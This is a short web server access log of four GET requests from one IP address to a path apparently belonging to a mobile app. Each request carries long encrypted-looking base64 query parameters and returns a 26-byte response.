186.102.6.137 - - [12/Feb/2023:07:50:53 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/TLbp6PQYbPOJ3kyuiWWFr8Y5/dZ9jz0ji0HYX0U+0HwHsBMBhxrP+QlgzbcE9XDSItq0UpTIzjJkb3Xii48/33B983fgN5e6lQkDy4MeI8L2KScJ/UQ4W4fhMswlq2ymFAhcDe/9ZbO2Xy+eNMF74FpH8ZIaREU0b5jtCS+Dc81tJrNSuwTXs+B/H7gNndT6MVgcbC9mqOAHxqUFrKpFy0nHORfW6AyBp2ZCAV8feC3hF44c+LOiJO4E7sLy4dwrd//2TGXywfQ==&u=U2FsdGVkX197/uCIUIaYa/K+1B47uhaSDIPUm6aeiEOFOs57djB4foMVtpmjeDUl&y=U2FsdGVkX1/jXT5rx6lvGwRs8eksicAKtL2RFM4PR3S5FSzh2IOKMMFOf2gLIw12 HTTP/1.1" 200 26
186.102.6.137 - - [12/Feb/2023:07:50:54 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX197/uCIUIaYa/K+1B47uhaSDIPUm6aeiEOFOs57djB4foMVtpmjeDUl&y=U2FsdGVkX1/jXT5rx6lvGwRs8eksicAKtL2RFM4PR3S5FSzh2IOKMMFOf2gLIw12 HTTP/1.1" 200 26
186.102.6.137 - - [12/Feb/2023:07:50:54 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/+izpBkC3RgHYhxqCP79ObTPUiO6HqlXwIO+NTZyewSzIBkTCmDePo2Zqy+RvYqCEtuTHQpFD+I00veNcHu6PPrsmFBfJEAZHJ8xZ3s/5dx4yRWCzJGbYHn3vdcwGkaXQRc/5uCsBWZeqXBSNBS89sJQytM1qBz6U=&u=U2FsdGVkX197/uCIUIaYa/K+1B47uhaSDIPUm6aeiEOFOs57djB4foMVtpmjeDUl&y=U2FsdGVkX1/jXT5rx6lvGwRs8eksicAKtL2RFM4PR3S5FSzh2IOKMMFOf2gLIw12 HTTP/1.1" 200 26
186.102.6.137 - - [12/Feb/2023:07:50:54 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/hbFPYeztGYAWybm5VYyyCJ6wHVpxIMWpmNA1CqO4I7M+sBqPBxUw/r1su/3+Z9wzr+owjUvt4a21hK0gCT+nKoAFsMAeC+J3iKYhI0lK+X8AQ24a9Yn75+K+8S5Jk7YKzIiRghaOPYhlWLwZfj2YSPqmcQRRgzWI=&u=U2FsdGVkX197/uCIUIaYa/K+1B47uhaSDIPUm6aeiEOFOs57djB4foMVtpmjeDUl&y=U2FsdGVkX1/jXT5rx6lvGwRs8eksicAKtL2RFM4PR3S5FSzh2IOKMMFOf2gLIw12 HTTP/1.1" 200 26
